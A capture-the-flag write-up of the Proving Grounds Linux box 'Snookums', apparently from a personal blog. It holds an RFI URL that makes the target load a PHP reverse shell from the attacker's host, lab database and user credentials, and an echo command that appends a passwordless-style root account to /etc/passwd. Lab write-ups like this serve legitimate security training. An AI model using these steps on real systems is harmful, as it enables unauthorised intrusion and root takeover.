> For the complete documentation index, see [llms.txt](https://kayra.gitbook.io/hackerkayra/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kayra.gitbook.io/hackerkayra/write-ups/proving-grounds-boxes/linux/snookums.md).

# Snookums

**Source**: Proving Grounds\
**OS**: Linux\
**Community Rating**: Intermediate

## **Enumeration & Reconnaissance**

* Autorecon revealed open ports:
  * FTP (21)
  * SSH (22)
  * **HTTP (80)**
  * RPC (111)
  * SMB (139 & 445)
  * **MySQL (3306 & 33060)**
* Usually, I’d check FTP first, especially since anonymous login was allowed, but I dove straight into HTTP (80) and got too involved to notice FTP until later.

## **Service Analysis**

* The HTTP server hosted a **Simple PHP Photo Gallery** (v0.8).&#x20;

<figure><img src="/files/wda1BWU1wEU7ccBbHyOp" alt="" width="563"><figcaption><p>Simple PHP Photo Gallery</p></figcaption></figure>

* A version number at the bottom screamed "vulnerable." Searching for CVEs led me to **EDB-ID 48424** (no CVE assigned), an RFI vulnerability in the `img` parameter:

{% code overflow="wrap" fullWidth="true" %}

```
http://192.168.192.58/image.php?img=http://192.168.45.201/shell.php
```

{% endcode %}

## **Gaining Initial Access**

* I crafted a PHP reverse shell and hosted it on my machine. Initial attempts with ports 901/9911 failed, likely firewall issues. Switching to ports 80/22 worked, and I landed a shell as **apache**.

<figure><img src="/files/itsh2NY2QBBkEOmIhv5g" alt="" width="563"><figcaption><p>Initial Access</p></figcaption></figure>

* Uploaded `linpeas.sh`, which flagged a PHP config file containing MySQL credentials: **root:MalapropDoffUtilize1337**.

<figure><img src="/files/n8CooTjfGL8LsFpZl48x" alt="" width="375"><figcaption><p>Database Credentials</p></figcaption></figure>

{% code overflow="wrap" fullWidth="true" %}

```bash
mysql -u root -p
```

{% endcode %}

* Found the **SimplePHPGal** database. That had a users table with 3 users alongside their encoded passwords, I picked the user **michael** since it was the one that's in the home directory.

<figure><img src="/files/8tpLe2GcJInJPsubswUF" alt="" width="375"><figcaption><p>Users Passwords</p></figcaption></figure>

{% code overflow="wrap" fullWidth="true" %}

```bash
echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d | base64 -d
```

{% endcode %}

* Decoding it gave **HockSydneyCertify123**.

<figure><img src="/files/J5TYOjNwaQ8RvsHeyIEX" alt="" width="563"><figcaption><p><strong>HockSydneyCertify123</strong></p></figcaption></figure>

## **Privilege Escalation**

* I then switched to **michael and r**e-ran `linpeas.sh`, which revealed **writable /etc/passwd**.

<figure><img src="/files/6WzrI8uF4WtLKehOBFtZ" alt="" width="563"><figcaption><p>/etc/passwd</p></figcaption></figure>

* It means we can add a new user as root. I generated a password hash for "pwned":

{% code overflow="wrap" fullWidth="true" %}

```bash
openssl passwd pwned
```

{% endcode %}

<figure><img src="/files/vmwOYPUgy8zCZhX93Ogz" alt="" width="375"><figcaption><p>openssl passwd</p></figcaption></figure>

* Appended a new root user, kingkong, to `/etc/passwd` using `echo`:

{% code overflow="wrap" fullWidth="true" %}

```bash
echo "kingkong:\$1\$xr7pWWIR\$vNF8Z7sc8mgBu6u7ZETyT/:0:0:root:/root:/bin/bash" >> /etc/passwd  
```

{% endcode %}

* Switching to **kingkong** granted root access.

<figure><img src="/files/oE3itiZ7j7F4PZappdAS" alt="" width="563"><figcaption><p>Root Access</p></figcaption></figure>

## **Lessons Learned**

* **FTP Blindness:** Skipping FTP might cost time, check obvious services first.
* **RFI Port Woes:** Firewalls hate fancy ports, stick to 80/443 for shells.
* **Double Encoding:** Always decode twice… or thrice.
* **/etc/passwd Write Abuse:** If writable, plant a root user and call it a day.
